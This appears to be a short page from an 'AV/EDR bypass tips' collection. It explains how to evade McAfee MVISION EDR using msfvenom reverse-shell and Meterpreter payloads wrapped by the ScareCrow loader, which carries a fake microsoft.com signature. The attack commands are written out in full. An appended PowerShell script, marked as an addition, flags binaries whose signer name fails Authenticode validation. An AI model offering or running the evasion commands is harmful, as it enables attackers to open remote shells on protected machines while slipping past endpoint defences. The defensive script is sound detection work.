Awesome AV/EDR/XDR Bypass Tips

McAfee MVISION


Last updated 2 years ago

Bypassing using ScareCrow

You can use the ScareCrow tool to bypass McAfee EDR. We tested three types of Metasploit payloads that work:

  • windows/x64/shell/reverse_tcp

  • windows/x64/meterpreter_reverse_https

  • windows/x64/exec

Commands:

$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f raw -a x64 -e x64/xor > shellcode.bin 
$ ./ScareCrow_4.11_linux_amd64 -I shellcode.bin -domain microsoft.com 

The generated loader obscures itself to circumvent protections and also carries a false signature so that it appears more credible to the target.
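From the defender's side, the false signature is something that can be checked. The PowerShell below is an added example, not part of the original page or of ScareCrow: it lists binaries whose signer certificate claims a given name but whose Authenticode status is not `Valid`. The scan directory and the subject pattern are assumptions, and it assumes the false signature does not validate against the Windows trust store.

```powershell
# Added example (defender-side triage), not from the original page.
# Assumptions: $Path is the directory to triage; $ClaimedSubject is a regex
# for the name the signature claims (the page's command uses microsoft.com).
param(
    [string]$Path = "$env:USERPROFILE\Downloads",
    [string]$ClaimedSubject = 'microsoft\.com'
)

Get-ChildItem -Path $Path -Recurse -File -Include *.exe, *.dll -ErrorAction SilentlyContinue |
    ForEach-Object {
        # Ask Windows to validate the embedded Authenticode signature.
        $sig  = Get-AuthenticodeSignature -LiteralPath $_.FullName
        $cert = $sig.SignerCertificate

        # Flag files that carry a signer certificate claiming the name,
        # but whose signature Windows does not accept as Valid.
        if ($cert -and $sig.Status -ne 'Valid' -and $cert.Subject -match $ClaimedSubject) {
            [pscustomobject]@{
                File       = $_.FullName
                Status     = $sig.Status          # e.g. NotTrusted, HashMismatch, UnknownError
                Subject    = $cert.Subject
                Issuer     = $cert.Issuer
                SelfSigned = ($cert.Subject -eq $cert.Issuer)
                Thumbprint = $cert.Thumbprint
                Reason     = $sig.StatusMessage
            }
        }
    } |
    Format-List
```

A hit means the file presents a signer name that Windows could not verify, which is worth escalating regardless of what the certificate subject says.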
